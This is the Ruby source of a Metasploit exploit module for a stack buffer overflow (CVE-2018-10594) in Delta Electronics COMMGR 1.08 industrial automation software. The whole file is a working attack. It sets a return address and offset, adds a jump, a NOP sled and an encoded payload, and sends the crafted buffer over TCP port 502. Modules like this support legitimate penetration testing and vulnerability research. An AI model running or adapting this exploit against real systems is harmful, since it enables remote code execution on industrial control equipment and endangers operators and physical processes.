## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Delta Electronics Delta Industrial Automation COMMGR 1.08 Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack based buffer overflow in Delta Electronics Delta Industrial Automation COMMGR 1.08. The vulnerability exists in COMMGR.exe when handling specially crafted packets. This module has been tested successfully on Delta Electronics Delta Industrial Automation COMMGR 1.08 over Windows XP SP3, Windows 7 SP1, and Windows 8.1. }, 'Author' => [ 'ZDI', # Initial discovery 't4rkd3vilz', # PoC 'hubertwslin' # Metasploit module ], 'References' => [ [ 'CVE', '2018-10594' ], [ 'BID', '104529' ], [ 'ZDI', '18-586' ], [ 'ZDI', '18-588' ], [ 'EDB', '44965' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-172-01' ] ], 'Payload' => { 'Space' => 640, 'DisableNops' => true, 'BadChars' => "\x00" }, 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Platform' => 'win', 'Targets' => [ [ 'COMMGR 1.08 / Windows Universal', { 'Ret' => 0x00401e14, # p/p/r COMMGR.exe 'Offset' => 4164 } ], ], 'DisclosureDate' => 'Jul 02 2018', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(502) ]) end def exploit data = rand_text_alpha(target['Offset']) data << "\xeb\x27\x90\x90" # jmp short $+27 to the NOP sled data << [target.ret].pack("V") data << make_nops(40) data << payload.encoded print_status("Trying target #{target.name}, sending #{data.length} bytes...") connect sock.put(data) disconnect end end